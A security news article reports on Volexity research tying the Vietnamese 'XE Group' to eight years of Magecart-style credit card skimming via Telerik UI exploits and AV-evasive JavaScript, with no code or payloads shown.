HomeUpdateEight years long chain of attack may be related to one group

Eight years long chain of attack may be related to one group

-

Last Updated on 09/12/2021 by Nidhi Khandelwal

The ‘XE Gang,’ a relatively unknown group of Vietnamese hackers, has been tied to eight years of commercial hacking and credit card skimming.

Threat actors are suspected of stealing thousands of credit cards per day, primarily from restaurants, non-profit organizations, art galleries, and travel websites.

Eight years long chain of attack may be related to one group 1

The actors hack externally-facing services using publicly accessible exploits, most notably Telerik UI weaknesses, to install password and payment information stealing malware.

The group’s operations were first detailed in a 2020 Malwarebytes report, but Volexity provided a more in-depth study of recent compromises ascribed to them yesterday.

More information becomes available.

Volexity was able to trace the XE Group’s infrastructure over the past three years and publish all technical information and IOCs on GitHub.

Thanks to a popular technique for loading malicious JavaScript snippets, the researchers were able to locate a large number of compromised sites all carrying the same skimmer.

“The code used to load the malicious JavaScript from this page exposes an unusual technique: the attacker uses the JavaScript keyword “object” to populate the domain value,” the researchers wrote in their Volexity study.

These are known as “Magecart” attacks, which occur when a threat actor hacks an eCommerce site and inserts malicious JavaScript that captures customer and payment information as it is submitted. The stolen data is subsequently sent to a remote site, where the attackers can collect it.

Eight years long chain of attack may be related to one group 2

The long-term success of these attacks is determined by how effectively they can remain undetected on a website by security software.

When this skimmer’s sample is uploaded to VirusTotal, it receives a flawless 0/57 detection score, indicating that this group’s JavaScript is extremely resistant to AV detection.

Nidhi Khandelwal
Nidhi Khandelwal
Nidhi is a tech news/research contributor at TheDigitalHacker. She publishes about techno geopolitics, privacy, and data breach.
- Advertisment -

Must Read

DirectTV streaming network will sell your data even if you don’t...

0
DirectTV is a streaming network that delivers streaming content as a service. The content is generally live sports and 14.6M+ people subscribe to their...